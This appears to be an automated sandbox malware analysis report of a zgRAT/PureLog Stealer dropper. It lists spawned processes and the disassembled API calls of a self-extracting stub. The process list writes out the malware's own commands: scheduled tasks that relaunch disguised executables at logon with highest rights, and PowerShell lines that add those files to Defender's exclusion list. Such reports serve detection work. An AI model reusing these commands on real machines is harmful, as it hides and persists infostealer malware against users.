Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:22:11
Start date:	26/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD70.tmp" "c:\Windows\System32\CSCE93499D36A1149A8864C8A5B6E525A2.TMP"
Imagebase:	0x7ff72ff30000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:22:12
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'" /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:22:12
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'" /rl HIGHEST /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:22:12
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'" /rl HIGHEST /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:22:12
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SIUNRHqHRVexchS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'" /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:22:12
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SIUNRHqHRVexch" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'" /rl HIGHEST /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:22:12
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SIUNRHqHRVexchS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'" /rl HIGHEST /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:22:12
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SIUNRHqHRVexchS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'" /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	04:22:12
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SIUNRHqHRVexch" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'" /rl HIGHEST /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	04:22:12
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SIUNRHqHRVexchS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'" /rl HIGHEST /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	04:22:12
Start date:	26/12/2024
Path:	C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe"
Imagebase:	0x880000
File size:	1'790'464 bytes
MD5 hash:	E741574F3B1602BA40508C8EE4E8CD26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	04:22:12
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'" /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe"
Imagebase:	0xf40000
File size:	1'790'464 bytes
MD5 hash:	E741574F3B1602BA40508C8EE4E8CD26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe"
Imagebase:	0x720000
File size:	1'790'464 bytes
MD5 hash:	E741574F3B1602BA40508C8EE4E8CD26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe"
Imagebase:	0xe00000
File size:	1'790'464 bytes
MD5 hash:	E741574F3B1602BA40508C8EE4E8CD26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ComwebDriverbrokerC" /sc MINUTE /mo 5 /tr "'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'" /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Users\Default\Pictures\smss.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Default\Pictures\smss.exe
Imagebase:	0x870000
File size:	1'790'464 bytes
MD5 hash:	E741574F3B1602BA40508C8EE4E8CD26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Pictures\smss.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Pictures\smss.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Pictures\smss.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Pictures\smss.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ComwebDriverbroker" /sc ONLOGON /tr "'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Users\Default\Pictures\smss.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Default\Pictures\smss.exe
Imagebase:	0xa40000
File size:	1'790'464 bytes
MD5 hash:	E741574F3B1602BA40508C8EE4E8CD26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ComwebDriverbrokerC" /sc MINUTE /mo 6 /tr "'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HpNAzDiYON.bat"
Imagebase:	0x7ff65aef0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	04:22:13
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	04:22:14
Start date:	26/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff653540000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	04:22:15
Start date:	26/12/2024
Path:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
Wow64 process (32bit):	false
Commandline:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
Imagebase:	0x370000
File size:	1'790'464 bytes
MD5 hash:	E741574F3B1602BA40508C8EE4E8CD26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	04:22:15
Start date:	26/12/2024
Path:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
Wow64 process (32bit):	false
Commandline:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
Imagebase:	0xff0000
File size:	1'790'464 bytes
MD5 hash:	E741574F3B1602BA40508C8EE4E8CD26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	04:22:16
Start date:	26/12/2024
Path:	C:\Program Files\Windows Security\BrowserCore\dllhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Security\BrowserCore\dllhost.exe"
Imagebase:	0x9e0000
File size:	1'790'464 bytes
MD5 hash:	E741574F3B1602BA40508C8EE4E8CD26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	04:22:16
Start date:	26/12/2024
Path:	C:\Program Files\Windows Security\BrowserCore\dllhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Security\BrowserCore\dllhost.exe"
Imagebase:	0x240000
File size:	1'790'464 bytes
MD5 hash:	E741574F3B1602BA40508C8EE4E8CD26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	04:22:16
Start date:	26/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff664ba0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	04:22:21
Start date:	26/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.5%
Total number of Nodes:	1497
Total number of Limit Nodes:	30

Executed Functions

Function 006ADF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006A0863: GetModuleHandleW.KERNEL32(kernel32), ref: 006A087C
Part of subcall function 006A0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 006A088E
Part of subcall function 006A0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 006A08BF

Part of subcall function 006AA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 006AA655

Part of subcall function 006AAC16: OleInitialize.OLE32(00000000), ref: 006AAC2F
Part of subcall function 006AAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 006AAC66
Part of subcall function 006AAC16: SHGetMalloc.SHELL32(006D8438), ref: 006AAC70

GetCommandLineW.KERNEL32 ref: 006ADF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 006ADF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 006ADF94
UnmapViewOfFile.KERNEL32(00000000), ref: 006ADFCE

Part of subcall function 006ADBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 006ADBF4
Part of subcall function 006ADBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 006ADC30

CloseHandle.KERNEL32(00000000), ref: 006ADFD7
GetModuleFileNameW.KERNEL32(00000000,006EEC90,00000800), ref: 006ADFF2
SetEnvironmentVariableW.KERNEL32(sfxname,006EEC90), ref: 006ADFFE
GetLocalTime.KERNEL32(?), ref: 006AE009
_swprintf.LIBCMT ref: 006AE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 006AE05A
GetModuleHandleW.KERNEL32(00000000), ref: 006AE061
LoadIconW.USER32(00000000,00000064), ref: 006AE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 006AE0C9
Sleep.KERNEL32(?), ref: 006AE0F7
DeleteObject.GDI32 ref: 006AE130
DeleteObject.GDI32(?), ref: 006AE140
CloseHandle.KERNEL32 ref: 006AE183

Strings

xzn, xrefs: 006AE10B
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 006AE039
STARTDLG, xrefs: 006AE0BE
sfxstime, xrefs: 006AE055
C:\Users\user\Desktop, xrefs: 006ADF33
sfxname, xrefs: 006ADFF9
winrarsfxmappingfile.tmp, xrefs: 006ADF77

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzn
API String ID: 3049964643-3481697521
Opcode ID: 94c8e12786638ef0613b3b04f570b75a14c1a2e0dc90d80a722f1687284bb7a6
Instruction ID: cd216fc6ef49992e84e9365bec485316e132f93424a72d0933c03afeb9a06178
Opcode Fuzzy Hash: 94c8e12786638ef0613b3b04f570b75a14c1a2e0dc90d80a722f1687284bb7a6
Instruction Fuzzy Hash: 9C61E071A04355AFD360BFA4EC49F7B3BEFAB46700F04142EF40696291DA749D44CB61

Function 006AA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,006AB73D,00000066), ref: 006AA6D5
SizeofResource.KERNEL32(00000000,?,?,?,006AB73D,00000066), ref: 006AA6EC
LoadResource.KERNEL32(00000000,?,?,?,006AB73D,00000066), ref: 006AA703
LockResource.KERNEL32(00000000,?,?,?,006AB73D,00000066), ref: 006AA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,006AB73D,00000066), ref: 006AA72D
GlobalLock.KERNEL32(00000000), ref: 006AA73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 006AA762
GlobalUnlock.KERNEL32(00000000), ref: 006AA7C6

Part of subcall function 006AA626: GdipAlloc.GDIPLUS(00000010), ref: 006AA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 006AA7A7
GlobalFree.KERNEL32(00000000), ref: 006AA7CD

Strings

PNG, xrefs: 006AA6C6

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
